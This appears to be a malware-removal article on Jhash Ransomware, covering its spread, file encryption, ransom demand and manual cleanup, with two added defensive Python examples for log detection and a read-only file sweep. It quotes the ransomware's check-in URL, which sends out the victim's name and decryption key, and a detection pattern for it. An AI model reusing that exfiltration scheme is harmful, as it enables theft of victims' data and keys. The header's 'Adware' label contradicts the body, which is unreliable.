Danger level 7
Type: Adware
Common infection symptoms:
  • Can't be uninstalled via Control Panel
  • Installs itself without permissions
  • Connects to the internet without permission
  • System crashes
  • Slow Computer

Jhash Ransomware

Every now and again, a new threat created using the Hidden Tear open source code emerges, and the latest one to be discovered is Jhash Ransomware. This malicious threat joins the ranks of such well-known threats as Onion3Cry Ransomware, FlatChestWare Ransomware, and Explorer Ransomware. Just like most other threats from the family, this threat is spread using the backdoor within spam emails. The launcher is concealed, and the user is tricked into opening it themselves. The threat is executed silently so that the user is not alarmed and does not delete the infection before it has the chance to do anything. Right away, it checks whether an Internet connection is available, and if it is, it sends information about the victim to https://app-1509153828.000webhostapp.com/write.php?computer_name={Victim Computer name}&userName={User name}&password={Private encryption key}&allow=ransom. The private encryption key is created during the encryption process, and it is needed to decrypt the files. Unfortunately, you cannot decrypt files by removing Jhash Ransomware.
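Because the check-in request carries the computer name, user name and encryption key in its query string, a proxy that records full URLs would have logged all three. The following added example (not code from the article or from the malware) searches such a log for that URL shape; the log format, host names and key values are constructed, and it assumes the proxy logs the complete HTTPS URL.

```python
import re

# Shape of the check-in URL quoted in the article. The key is captured raw,
# up to the fixed trailing "&allow=ransom", on the assumption that the
# malware may not URL-encode it (so it could itself contain "&" or "=").
BEACON_RE = re.compile(
    r"/write\.php\?computer_name=(?P<computer>[^&]*)"
    r"&userName=(?P<user>[^&]*)"
    r"&password=(?P<key>.*)&allow=ransom$"
)

# Constructed proxy log lines: timestamp, client IP, method, full URL.
SAMPLE_LOG = """\
2024-01-15T09:14:07Z 10.0.4.21 GET https://example.org/index.html
2024-01-15T09:14:31Z 10.0.4.21 GET https://c2.example.invalid/write.php?computer_name=FIN-PC07&userName=mlopez&password=CONSTRUCTEDKEY123&allow=ransom
2024-01-15T09:15:02Z 10.0.4.33 GET https://example.org/write.php?id=7
2024-01-15T09:16:40Z 10.0.4.58 GET https://c2.example.invalid/write.php?computer_name=HR-LT02&userName=jsmith&password=aB3&x=9?Q&allow=ransom
"""


def find_beacons(log_text):
    """Return one record per log line that matches the check-in URL shape."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        timestamp, client, _method, url = parts
        match = BEACON_RE.search(url.strip())
        if match:
            hits.append({"time": timestamp, "client": client, **match.groupdict()})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        # Preserve the key with the case file; do not print it to shared logs.
        print(hit["time"], hit["client"], hit["computer"], hit["user"],
              "key length:", len(hit["key"]))
```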

When Jhash Ransomware invades the operating system, it immediately copies itself as “local.exe” to the %HOMEDRIVE%\[user]\Rand123\ directory. During the encryption, the threat targets data within the folders of the %USERPROFILE% directory, including Desktop, Documents, Downloads, and Pictures. According to our research, the threat specifically targets files with such extensions as .txt, .exe, .doc, .jpg, .gif, .wmv, .avi, .rar, and .7-zip. The files that are encrypted gain the “.locky” extension, which, naturally, should help you identify the corrupted files faster. Once the encryption is complete, Jhash Ransomware should download a file from imgur.com to the %HOMEDRIVE%\[user]\ directory. This file should be renamed to “ransom.jpg” and then set as the Desktop background image. This image file shows a text message that informs the victim about the encryption of files. Besides that, the ransomware creates two TXT files called “READ_IT.txt” and “Leeme_Nota_de_Rescate.txt” on the Desktop. The first file, for whatever reason, gets encrypted, and so you can delete it right away. The second file provides us with more information. Both the TXT file and the wallpaper display text in Spanish, which reveals the target.

According to the ransom note in the TXT file, the creator of Jhash Ransomware wants you to send a ransom of 10 US Dollars using PAYZA – an online payment platform – to jhash.bancaenlinea@zoho.com. They also want you to prove the transaction by sending a screenshot to the same email address. It is suggested that only after these steps are completed, the steps showing how to decrypt files will be revealed. Although 10 USD is not a lot, we have to warn you that you might end up wasting this money for no reason at all. If you believe that cyber criminals would keep their promises just because you fulfill their demands, you are inexperienced. The researchers in our team have lots of experience when it comes to file-encrypting threats, and we know that if files are encrypted, that is unlikely to change. Does that mean that you should just remove files encrypted by Jhash Ransomware? You can store them in a folder for a day when a decryptor becomes publicly available, but that is not something you can count on either. What you can count on is that you will be much safer if you delete existing threats.

Can you delete Jhash Ransomware manually? That might be very easy to do, but you should consider using anti-malware software anyway. The instructions below provide you with a simple way to erase the devious threat yourself, but only reliable anti-malware software can make sure that your operating system is cleaned and protected at all times. It can automatically remove Jhash Ransomware and any other infection that is present. Obviously, if you decide that you want to handle the situation yourself, you will need to scan your vulnerable operating system afterward just to make sure that it is completely clean. If that is the route you are taking, make sure that the malware scanner you employ is trustworthy and up-to-date. Once you take care of that, you should also take care of your personal files. Hopefully, they are backed up already, and the ransomware has not affected you in any way. If files were not backed up, and now are lost, set up a trustworthy backup system to keep your files safe in the future.

Jhash Ransomware Removal

  1. Simultaneously tap Ctrl+Shift+Esc to launch the Task Manager.
  2. Click the Process tab and check for malicious processes. If any are found, click End process.
  3. Simultaneously tap Win+E to launch Windows Explorer.
  4. Enter %HOMEDRIVE% into the bar at the top.
  5. Open the [user name] folder.
  6. Right-click and Delete the subfolder named Rand123.
  7. Right-click and Delete the file named ransom.jpg.
  8. Move to the Desktop and then Delete these files:
    • Leeme_Nota_de_Rescate.txt
    • READ_IT.txt.locky
  9. Empty Recycle Bin and then install a trusted malware scanner to inspect your operating system.
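Before deleting anything, it helps to list which of the files named above are actually present and which encrypted user files should be set aside. The following is an added example, not part of the original guide: it sweeps two directories standing in for %HOMEDRIVE%\[user] and %USERPROFILE% and only reports, it deletes nothing. The function names and the sample tree of empty files are constructed for illustration.

```python
import os

TARGET_DIRS = ("Desktop", "Documents", "Downloads", "Pictures")


def sweep(drop_root, profile):
    # drop_root stands for %HOMEDRIVE%\[user], profile for %USERPROFILE%.
    droppers = [
        os.path.join(drop_root, "Rand123", "local.exe"),
        os.path.join(drop_root, "ransom.jpg"),
        os.path.join(profile, "Desktop", "Leeme_Nota_de_Rescate.txt"),
        os.path.join(profile, "Desktop", "READ_IT.txt.locky"),
    ]
    to_remove = [p for p in droppers if os.path.isfile(p)]
    encrypted = []
    for name in TARGET_DIRS:
        for dirpath, _dirs, files in os.walk(os.path.join(profile, name)):
            for f in files:
                path = os.path.join(dirpath, f)
                # The encrypted ransom note is listed for removal, not kept.
                if f.lower().endswith(".locky") and path not in to_remove:
                    encrypted.append(path)
    return {"remove": to_remove, "keep_encrypted": sorted(encrypted)}


def build_constructed_tree(root):
    """Create empty placeholder files that mimic an affected profile."""
    names = [
        ("Rand123", "local.exe"), ("ransom.jpg",),
        ("Desktop", "Leeme_Nota_de_Rescate.txt"),
        ("Desktop", "READ_IT.txt.locky"),
        ("Documents", "report.doc.locky"),
        ("Pictures", "holiday.jpg"),
    ]
    for parts in names:
        path = os.path.join(root, *parts)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as root:
        build_constructed_tree(root)
        result = sweep(root, root)
        print(len(result["remove"]), "artifacts,",
              len(result["keep_encrypted"]), "encrypted user files")
```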